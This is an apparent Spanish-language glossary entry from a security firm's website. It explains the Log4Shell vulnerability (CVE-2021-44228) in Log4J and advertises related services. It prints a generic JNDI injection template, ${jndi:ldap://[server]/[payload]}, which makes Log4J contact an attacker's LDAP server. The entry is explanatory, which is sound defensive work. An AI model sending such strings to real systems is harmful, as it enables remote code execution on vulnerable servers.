glosario de ciberseguridad

¿Qué es Log4Shell?

Log4Shell es una vulnerabilidad remota que afecta al componente Java Log4J utilizado por miles de aplicaciones para guardar logs de la actividad de la aplicación.

El nombre de Log4Shell se le asignó a la vulnerabilidad identificada por Mitre como CVE-2021-44228 y aprovechaba un fallo de filtrado de los datos que llegan a este componente permitiendo realizar una inyección JNDI. A través de este fallo era posibile inyectar cadenas especialmente manipuladas que permitían la ejecución de código arbitraria.

En la mayoría de los casos, simplemente era necesario añadir este contenido a cualquier petición HTTP para forzar que el componente Log4J estableciese una conexión contra el servidor ldap del atacante y ejecutase código arbitrario.

${jndi:ldap://[server]/[payload]}

Artículos de ciberseguridad relacionados con Log4Shell

Diversos artículos técnicos vinculados a Log4Shell y la ciberseguridad han sido publicados en el sitio web de Tarlogic.

Servicios de Ciberseguridad relacionados con Log4Shell

Gestión de vulnerabilidades: Este servicio de análisis constante de vulnerabilidades posibilita llevar a cabo una gestión del ciclo de vida de la vulnerabilidad y disminuir la superficie de exposición.

Vulnerabilidades emergentes: Este servicio se pone en marcha al momento de divulgarse una vulnerabilidad crítica que pueda comprometer el perímetro de su organización, permitiendo actuar de manera anticipada. Investigamos el impacto de las vulnerabilidades de día cero en el perímetro las 24 horas del día, 7 días a la semana, e identificamos los recursos afectados.

Threat Hunting: Servicio gestionado que se centra en la identificación proactiva de actividad sospechosa y el control de amenazas en los sistemas de la red, empleando telemetría producida por tecnologías EDR y XDR, y siguiendo la metodología establecida en el marco MITRE ATT&CK.